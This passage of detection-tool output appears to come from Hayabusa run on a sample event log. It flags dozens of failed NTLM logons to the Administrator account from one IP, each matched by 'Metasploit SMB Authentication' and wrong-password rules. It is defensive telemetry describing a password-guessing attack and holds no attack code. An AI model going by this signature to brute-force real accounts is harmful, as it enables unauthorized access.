SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: 
